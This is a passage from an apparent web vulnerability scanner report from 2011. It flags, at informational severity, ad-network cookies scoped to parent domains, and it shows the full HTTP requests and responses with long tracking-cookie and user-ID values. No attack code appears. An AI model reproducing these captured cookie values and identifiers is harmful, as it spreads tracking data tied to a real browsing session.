44CpImVmkSAL_bstOXxNREWWjoLotWNuGCSfD1VO5qVu-qWBAgSu17OBqpU4PgvZpleNg0TWB0RMQGeS7_O3x1RSd2BwdXFbTy3K7n-2J0MAMXWCl91Alk4rQOdMMecrpXJTexKmmidw53l0QWbnqGQiRb9ZAs_QgD2QiSjBcYABPrjR7j2Lk3dbwCXD_XY4Mg3uZtdk-w7CLx2fkIxdgjO29elycICbV2IcqKk7eSEhOsR2I7EGmUrCtsiY1t4sA6JphOvlAw2WskIYUfYQOHF0V7XP3BnwAAohd7yjHvV65-NFPJ6k-u-He4VyfKWMt3v_OVQR5WJnhMTPJdNSN4V9p_6WYg3opYqtkQWt6725kkv7T1ST5UzgcmolTZJyYmPqM8Zx5g7UbhYw2jQWp91FsB5bAn8V7foSNbpzcCtEZ09ICcgOStrfC9SER61onVprd_onMryjVa6LMEO3kCLjO0IvNryW-5O2fQU_LHsnkesyo4l_i11ujvhhLGZ0k6S7VChstVJ88iyvvPxUtm5pXVUyRredJBloe4tetp7m__kLcfbP_Eqw2fpNrGQbnw-cmbaxS3fhnjhdAkaWgX2Wn9EHpE9nRxmNOfa7N8eKNOKfhfV_78LZJ3SfN4upb6BnAigOn-d0svVlW7kDvxwmUOO6di4L3hItnppqGTp1J33WvO-vJNJIZsJvokUWIw2BigWHhckIDi1Fkwg7XRH_BYZrAe39meCnmP7nr3-LKEGgJRL73oAwAGqSF7i_Nh_lHANdO2N4y0oQd9WbNchd4KJ0GSKpCvg4R8pLEeo1jSuGz7oMRCuDH5HeVZE_VQRFdHjYukJVRG_nBNs8V1gYCYsm415gn0H91lt8VKKWdXKqCTDOHhKd5JX6_fglnf3B3DmgLLJzD9On5Z3FQzHr3F5l8MAWEAnGYSU3-NOxK7uJcD_RRN6ky6CN1PuWwiDRMNWXU5_w-MjKW_GcbVrZmBGA1Mut6aa3Kh20avKWSvO9zAk-RcrayBwLlfQ6HJrTI2xWc5r5ahhRJbOL_KFk5m6LShjvKyOkYlhN9vFIet_K_9AtqbHgySr2KqGN9-ddSeXZA12yR4NFKSQVYrwFZeGZXu_hX3sKoCSIV4DWAcntMWndiH-vYNrPSKHelCwJAEbBWk-i6uJHnwpuo_ZlHWQ7Uow01sqOwZlLLH_X5cABcyU66VZIb4K9aY6J9YtdmBMo_MbyWI1dW0gjXofsjNDSVdmLkilEs-WrYhDZbcAUC80ovx39ycP1rWckNvY-gaRNscNt9mHktMDgPCf0UpOcSdXY1OdfB0pHhAy-UN7WkybRCuMZ-d6VJt7LsD-FnsnfZ8jbE_g98PqM_uWZz3crv1z5M8Pih0AXJSyUJ19uPJlG_3tcOZ-AmYnpm1EC9jEUmxwdT9kcJ4edcTEb0PB7-YTDSCBFoXDPahTXWMSS5FlUmssMmrL-8e41aSohTuap9UjfyHEsmR4UUOeK0HWz0NORe7zSZgfEzvdO7smtDILpMESpu_ZZWNCNkhXtVikoOt8vg9pIynRKrCXnowDQSRXo96RunD8qfbaYv7vzaVyY9QuY541PZO6Ny5vnKLIxfYwIsEt0kokdZeF3EOMiBo3Mk1h9PIxxR65ZOcJUjvfs2TVsX4KQGnKdgRSGoam5QlCCa_OGKS42qBmwv_wvY-RzCoz9_t8alDj5k8zTq0J4PqUJQ0otSVJy2PGeMK-XcarFw0nA3H-YF2Wl5Fn0PEnfhbtUbz9ct1MV79PyeyDZ9DvWp_EdJGyYA5O7dtrDry_s9lkRyz6GlDS8t-Rfdp17-epPba0D46AHy_lzghAFfvmsyLLawNKxCeHxRRevicSSfkeY6SuOCRIr05W-BHUNxq2SQwElM-yQwx2zQEg-z8-t9y-tMNQp-ZYdLjH27LJobmgwjquUBX0fZWtmyuXhGsmOr7JOEwxd8-DByQ2C9Yv7XgNTcfznCXbacaQtf_dWsSUQ8GKNCUK0zaUBXpMoL53_gWUTUNlxoMRwaryBWePdHp2MxlVET9_8XQcM4q6yLp52rmfN4q3l5EKsYbOM4UyWN4YxvN7y_b8zhiDb1QFGUx3T6Icw0cNHVJuxB7zpQOkrNL46G4jxTVXOyK2iEcB5PBiiMFehpPTzXehUikIWBvjjSGaDoOwEZA0LEeWwvlbOo8Dfurrf5fw5Oi; Domain=.turn.com; Expires=Tue, 13-Dec-2011 11:28:42 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1210787&t=2
Content-Length: 0
Date: Thu, 16 Jun 2011 11:28:41 GMT

10.223. http://r.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/pixel.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=7183228360285489408; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:06:35 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225195243&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=QM70Whve3yMvxkhKlZSDFc8jBjr9GZaXPVHd3KPTbrVh-L3XcPmT4hHXOQgApIlYYCcoFPzHtthoKoScENuCacAfwlpOGZwMiTYKzkLyV6yLZO8TKZa-nLTQQ4a65pbCg5Ip47iYWcr2TLdwTDr0L4oBBpiyP3J8NU50OkfeFof5nfT0WqmMXNTAO47jNWqP9DMJbnJ4jgxRBVKYcWOOoBo1vu2lsqV8DN9Vps5BPlmPLL60Ne9Ei9t17XStRc4rGERgBg46FC_PZzOaKvw_-cZloB2cEevUSjzsvfqJ8qZhgZ9g0kmeR-0KBwkm_b3-nHDVWO4oEVu9LZTNJAoERvvIJejvF6b257maU3ML6OZFn0pS1M8s2KPrvUfPPF0_ewHYGlNdqDaG9FYWPprE_WjI_lsRoaOz7-O-vgmKJiTz-KIh4eZr0ecbMlDpVZu91zdW0hE-4eLwR7bomsP7JSdqWSoz4sC-t192PZJ_v5Q-P1VlQMzPKKE64Al6GE9_qQBVWHaPX-roIWbRumWL1-XpDwD22ZRNSBnUmAd0wjxC8t8bNFJSd1YiPEk8t_65cnD2Yeg02hxYDcV4Js2beeQ5R5-3xXfzzH2krAPRf428tdb3ea_CHM6GXs7htoYXSpzxUEP4Lawlcjwmuu0sgABXItk3mefJp5QRHv4O0nQLT7vqCmjKMUnpRJ6SJsSELsnefots81rrNB8RkZzwt9xgKqCmjZaalMlFzn1gedMiR83opqf2DdmsWkwVThPxhyYcbbPOXHwjOkupykmG8XHU2Z_bwsvqeY5PpknKks9Ka5pRG06H0tQ1iybpB3pDqsDA387b4GyTrdtR0OxRq1W2-clEv_ue7qpjwh19AlSzwxLx1pBhUX4CYwoSQucKtJqb949HbLP0at-l-Te-c7NLS367-cid5bH8-bJWmY8nC9B9w1ij88w7eqsM7UhZeuq4rrlofmxpvpW8sH43ef-7J7zFZpaqjQcGC_vq5exjB6sqt4Mo-GvkAj2qErRL9pWBI8bQOJli1okJuMhLcQljneDOkY9olIfd-ve5Qn4-P1VlQMzPKKE64Al6GE9_6W9aRH84b2cB20BvmgB1t-XpDwD22ZRNSBnUmAd0wjyOWY3k4-itBWJe_k62xWOCrFV4LhRdbHCAEu2Xc3dVj-Q5R5-3xXfzzH2krAPRf418WpxTiSnvzOJ-ZkQfvNQASpzxUEP4Lawlcjwmuu0sgAGs1MSewshLM0Q6GhK5Ns8fU1J7JmYpzzzNP9hB_wUy05oRsNhTbhcD1_xCDQojfMSuZLsISBijKSjMDSgLlyDjsNAVa5Ct7DxoA1avkLsQ815KVjL9JqXyOpgagVKRMbntt6vzlmgFJ9k1Zzq45WeFCQUiSJFaYOp4MQlbe-RFUEK9KsJrC9CLkGJUacP7jEa1wTMgEYoXiZA8_W3FI42qThwrh-6wCu7vlgqZNOXixmWgHZwR69RKPOy9-onypkTIcQzOQc65c9KVO3IQPv8Yd11jfaAGeomVXk2jyqz756mNhe7mBUb-nxi7SHg4OCY4fQNDPmLA1QCvKDvVxcR7AdgaU12oNob0VhY-msT9lb_ydeK6sfV-VwC1t6PXZrSU8zXCbuEO-Hn-xUU7T4MdZMXr1rBrtZHchRIeH_p0MQswiaZbyLrfvl0j4wXxTj4_VWVAzM8ooTrgCXoYT3_ukoy-I69c7SrUTlHbB6rZ5ekPAPbZlE1IGdSYB3TCPPtQxe5L3Tuc-yk0WOEmJZ9iOsnV5UjcUOjnXUSJzJan5DlHn7fFd_PMfaSsA9F_jfnYBNZ11ca-Wgmkknbh9eNKnPFQQ_gtrCVyPCa67SyA_xeh6xaAKc9mefeGrL2bordkSY3wrTx66nlJUXJL2YzTmhGw2FNuFwPX_EINCiN8l08PBB5hX0JN8MvjDOsPSeOw0BVrkK3sPGgDVq-QuxAsFTUl8EdeBakl_JEHsyGF2Jfo-RxTjyjBkOV794zNZ0kTA-aymPAds4qYFrApgUvcPT0oUz-YZYVaDcHqgl-9xmWgHZwR69RKPOy9-onypimfvYrBKXvtznWuT43S50y-3u16r0dKm_zz3ndHe3WlG-QgtH60dqlqdrI16uF-EVNzoshUKoWhiHnNcI8oP4V7AdgaU12oNob0VhY-msT9kNb2AdwFV5i2vxwzlIKJ3BfY904hG-_CHlEd9j-vzfzk5Jifrc9V1OOzEX32QifKI3TThUmivC2QQLLhMmAROj4_VWVAzM8ooTrgCXoYT3-ZdIfAS6iVxgYyOedo9Ki95ekPAPbZlE1IGdSYB3TCPEX3xTtUTn7ghX1OdIngM2q-RWnunI4BlM040X2RcB965DlHn7fFd_PMfaSsA9F_jUBCGuQvL_fhodmVMnOIMvBKnPFQQ_gtrCVyPCa67SyAw4hmx2eXEqzbsKwy_MNlFfUa0Y_5ftklciMdgbQhb_wbdYORBXyNJvBU7ewnBysYP_zg1-oPoaJCGGP6Vt55Gz_84NfqD6GiQhhj-lbeeRs__ODX6g-hokIYY_pW3nkbP_zg1-oPoaJCGGP6Vt55G1OKf083dm4Ocqz5E2RJpVu9TfQkOcNz7DOIIZP_23WvvU30JDnDc-wziCGT_9t1r71N9CQ5w3PsM4ghk__bda_nUnHYqNkC6RPs4-2B8pJoMqCuwkKr26TEWeaS686ExCPxJGFKBs6DSrH4oyWVjhIBdxGEbgsgCDz8r26d8pRZAXcRhG4LIAg8_K9unfKUWejxkXIMl02q9l3ycv51k_QH1ePXpCkOqUdD3FJ26E0LEgnOhSnZw4WOirtIvKWwJRIJzoUp2cOFjoq7SLylsCUSCc6FKdnDhY6Ku0i8pbAlEgnOhSnZw4WOirtIvKWwJTJGg5u5RuPReUxP5byb5LGsjsJdNDz0zBLNR8ReLDcirI7CXTQ89MwSzUfEXiw3Iv5E8JDY11x5xog0GskBswr-RPCQ2NdcecaINBrJAbMK_kTwkNjXXHnGiDQayQGzCjVgVkoy7DysIPcuC3AUG0sb1BDdWaxOURi_bqX1S5T5G9QQ3VmsTlEYv26l9UuU-W___E3ohWz6drp_rI2j18pjDJAj7Gbh3rF9uN2-5_zdRHqYmtLfdK6unD4Xv15XLH0evbFMdkuI2WqEUI01UYXDJU38vLMvNPfD69rioBNl6-78JM-YwVK9vMhQzP5aE-vu_CTPmMFSvbzIUMz-WhPr7vwkz5jBUr28yFDM_loT6-78JM-YwVK9vMhQzP5aE-UaEwuQGXrKf1B0pg93pQC8wfsfoRTDgpAqCg9KVA9UvMH7H6EUw4KQKgoPSlQPVLzB-x-hFMOCkCoKD0pUD1S8wfsfoRTDgpAqCg9KVA9U-Nxmcu6N80G4H7yE1a6GL_jcZnLujfNBuB-8hNWuhi8zo63SsMKXllQ8R3TROrVZwRV4qFgI_yJZybaj30x3rZThUGsgezmPZdo0hiRJAEU2UlTEERLOiMahUz0Je5vrQpUNsf8ubz28dE3HpFhXM4HLQRF00hhIXSJp9kwMyEKBy0ERdNIYSF0iafZMDMhCgctBEXTSGEhdImn2TAzIQou93XF3r4cgLiZIl0wssIM; fc=c8voyByxtfmxf-PR5HgfpjgORIc3Od-xFb-8M8t9VWkz6wrQqI-cCCIP4q7JSoro0YGlpSJHEwaZrD9xrQykZRLTM2UWqcEggsPn2JlFm6WKJ47y0SjHASrSoX2-_RWGR8GD8YL2uMyYOovbWSVtT_OjMRX_o6D3TvHXeB0H3IoJPxIPX2Q6BIRFliap-hOlRK2X8EADYMp4JB-33zSWnLP_4lD6MCBjT4SRxTIxlhNKLFBAG3Fk9H3_mDAMZFkDVnBVtdUIoJ-JIgllkJFaAJbHZLznezJA10wgg7oc-ufuxx6wPWxSLH-VTpbekwI2; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C10%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15138%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7C15110%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7Cundefined%7C15138%7Cundefined%7Cundefined%7C15138%7C15138%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15138; rv=1; uid=4325897289836481830; pf=bskS8Lli70BjXEzd5NYfF8V9tHnIhHPKzn-ZptMbz3NTv4g2_4PHk6pD33NmTL25iyDxX-e5nvqK08ftGFlNZcB-blYU8Y2b3uGZySbN9k4boogWXDFyI4_-RvN_buohq-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdbR_ukiIJxkBku1CxquV17mPFnSRDfouZL6wYhXooxR9ULrxpvguFI2ofDAIOd3EuO9yXy3nBEXqSScPA5E39O2_zg7l3tDIiyF94B5aERskWHv8BOnUkNaZrdPIQNGZqdwsP9I0MRtXw8xQWWbNPUyQsdjE_Scn2QYUNUmcT7rDH85LuW-sDtP4uwhJo9atGrEPrXDmdsIAOzEayx_QQ10pBlWBp0q8wJgIWBSuNhQqif26eEkDb5MRTYvSKoQwNXOBQsIqeIWsKbow-3MTFvdSUC5aHu9blDf32RjYS8Q0XMZuh1ZAgzt41nq2NRCSX590hwfiGo-qcVT2kvWmzeR7b1paN0zLvFemp5AQnABOzIFk-pYt5rgVKJ87aXtgPb-mafaJ5_5dz5FYF2gdO3-RhTnUyFltTQjNRcqU7m_5Dsdg2BVOoqsZOS_mkJdfuPEzm6ziEo1_QjXTUZsQGb3aBmo_VB_3afAvA7HmJ70VD1x9GqiaHujprGHOBA7aEDie69XnZ9g3UdQ8qboT72h45foF_fR8Dfspr5EIo6mININ0MwGURZOI6NOy-sr20mDmWfrauITMqFQqh085LSKQUL7YGM0pJp1-FIztq58QhVWy6LSDOwot2ckvPUzkd-FnxN8NhVB8sqANsWORR78w7iqAGDudyRR4sGrjr4yCu4BPZ9sxxEAJuqkU9WhgK5HyS-jWx86QRjwbOSlxW_AShejO2Api9OqW7wGthrtivajOoHMt7EKDIqFqYM0LalgBhHGk98NLPXedpy1UU1G0p61bv1d1Qe8RvD9O3tReDwxPBbZMzCCP1zNubGNg83l1aV51TfDhTgj1yUZOWuS-pj8W99_7k59ODgmGDUx1RLP4RQV5YsF7eRC_oBFtd7vTs-bMZZ3cr36hzZbdHwcgMjIQ67GgiGFnif7dZxa3qqTs_pw5jFRYMsjf2CDWROI6mFHsv9rileAh5u94Tal8X9jZGPmZVvtACyANcU61_2D_gjytCfJX5eIYzCUnD9N0uTPecPGlXnt0zeFF6nGhy-4kHkvuGu7mFLrHknQIOqyVa7C5Vcz2ztFo648TLIYncavW2EU0-FxAowg7Q_J3_JUWPrldWd5VL7X-3ELxQm3QGLlDe9QHA7dTmmKmFxV0767zf8vh0-XU0u6MJx4viNkNYwNHgm3A-Zsn_tb2nFJRjBcEMxdDM5u496FsXzZoCQNrRn4Nka-1SbHAlq1j0766BFlUYsZHI9nvDUSjNUKoFWTkAUa-o1j-LL1ebdsaBpOZQwog1WHvup_q5MU0eWf_8Tnz19zggAp1l0o0E-qtSYNUJ36V_bsysgOo8ovHlz0rw4urFgweCpjhoovSxZ6xAsLQbFPBlhboS688EaXiGds-5scOf0AWtR0WtyJH-06RSCV4rzVRndoxKQ6xvTNWKSQfuYds5-6wqXTrrprCUxSH31llwL8axfVJ0d6h2Ke1Lez9-eYMqCkG4uUOXcVRZwxg85KAU3HRwHZ-EWY6qIaKdc8DaRYJXxJzEtphWqdWwTUQc6r3kmRMNC1ofRqXiWAg7U15-Vq8fXUTyQ-Foh2RKGC89bCSZhuIo0DelrjnD_y1FdMAK6632Po5svz9Xs-GXO_PYmIh52EUXzRY-jfWrhp-btGaCKGToFYaTe9bd1jKXwduyoimxxjrfcWCeJq1txaaBU_3Uczg1vUpNInXslg4NWbOv3i1AMVsxWmxcjn77s3i60QHhTEr6gILrU4PmsHL3FqzwzpkTuJbzWi_g5eyZHwtMfpYoYwULodolIu7euVx1T6-kom1lfGeK534YvRLg1f6xfa7TbJat7GFUh5YcwiKTv6i2BObi71nwu2712ua_zaapTMdVqI2HeT5VUjRYlLwTM6Q4btGEdG0d_jWUX-DJJ6s4pWL_6FerjeM6JRh-LuLiaWTXIluKkF9otMRxuQA1xZO-l_PyGdq8ZIdQBo46D090aTaKlV1enoq-_ZVUdLnFjEj8JuvB_NmaEIhlkkUtL2E3UODDMR1tOQu8PjS8RbchSrxsTjxxMOUEsUJ_Z756RnNmhOA_TD07hZfxuz8bhfLCVULYz6Ok1J2_QA_kXIY92iqRVh1b6IbTDyOALqZNl5K11KDpAXL1nqDbSN94B3fAGfWH1075KVzt7-y7v8wzj5HvH-kwIHXGh1rq2Sy1u7pxUuundR497HrST_MMHxNG2Kdut19FcHWUqjUfID5JAiaS2fFEZWuWIqjpSvJM2ivPIAO7c_zUdwbkiWS8ejzieFqJCa8rSsS_dWSQq-Icz8Io9aHLgwbQxkFBxTOEAWmKRZWPfJkX_p8vFnb1Nu9kYvRadgXAM7qphVq6O0Tj

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=7183228360285489408; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:06:35 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 16 Jun 2011 12:06:34 GMT
Content-Length: 342

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
src="http://cdn.turn.com/server/ddc.htm?uid=7183228360285489408&rnd=8627178031942219930&fpid=4&nu=n&t=
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=16893018/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

F1=BA5U63EBAAAABAAAAoBA4BA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:03:44 GMT; path=/
BASE=x7Q9ji23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/P!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:03:44 GMT; path=/
ROLL=U6APXjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:03:44 GMT; path=/
16893018=_4dfa5390,0313612446,768033^981200^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=16893018/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308251024304&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; C2=QOl+NFJwHob0Fh6sIWwJoa0itKPCC0nhcJpwEg02FSMBdbdhETwihXIxEwjmGSMBxGehETAQvaIxEQW4FSMBLpphETQghXIxEgN5FSMB6ijhETAmhXIxEAY4FSMBdDmhETA/yaIxEAVZGSMBYimhETA3WaIxEQY4FSMBFGehETAxBaIxEU1aGSMBbTehETQwBaIxEYnXGSMBWGohETgQvaIxEogmGSMBxmphETQRgaIxE0soGSMB8mphEHZAmZOiGeZj0jw+NXUbtiGA8MoBj7a+AcsmGMuAEOpx/aLuBoKuGg/smJwoka8vzClALRqx/WaxAMdPGNwrQQwdIaEhq62ApVmBuTqHIUbNG4WtrCQIzawIwOICM/oRvdr0IwKvG+G; F1=BA5U63EBAAAABAAAAkBA4BA; BASE=x7Q9ii23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zO!; ROLL=U6APWjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/A!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.981200.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 19:03:44 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 16 Jun 2011 19:03:44 GMT
Content-Length: 1559
Connection: close
Set-Cookie: F1=BA5U63EBAAAABAAAAoBA4BA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:03:44 GMT; path=/
Set-Cookie: BASE=x7Q9ji23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/P!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:03:44 GMT; path=/
Set-Cookie: ROLL=U6APXjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:03:44 GMT; path=/
Set-Cookie: 16893018=_4dfa5390,0313612446,768033^981200^1183^0,0_; domain=advertising.com; path=/click

document.write('<HTML>');document.write('<HEAD>');document.write('<TITLE> </TITLE>');document.write('</HEAD>');document.write('<BODY>');document.write('<OBJECT classid=\'clsid:D27CDB6E-AE6D-11cf-
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=22319790/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=Vnk+NFJwHob0Fp6sIWwJoaUjtKPCC0nheJpwEg02FaMBdbdhGTwihXoxEwjmGaMBxGehGTAQvaoxEQW4FaMBLpphGTQghXoxEgN5FaMB6ijhGTAmhXoxEAY4FaMBdDmhGTA/yaoxEAVZGaMBYimhGTA3WaoxEQY4FaMBFGehGTAxBaoxEU1aGaMBbTehGTQwBaoxEYnXGaMBWGohGTgQvaoxEogmGaMBxmphGTQRgaoxE0soGaMB8mphGHZAmZOiGmZj0jw+NX0btiGA8MoBl7a+AcsmGUuAEOpxBbLuBoKuGo/smJwokacwzClALRqxBXaxAMdPGVwrQQwdIakhq62ApVmBwTqHIUbNGAH; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:13 GMT; path=/
F1=BUdS63EBAAAABAAAA8AAICA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:13 GMT; path=/
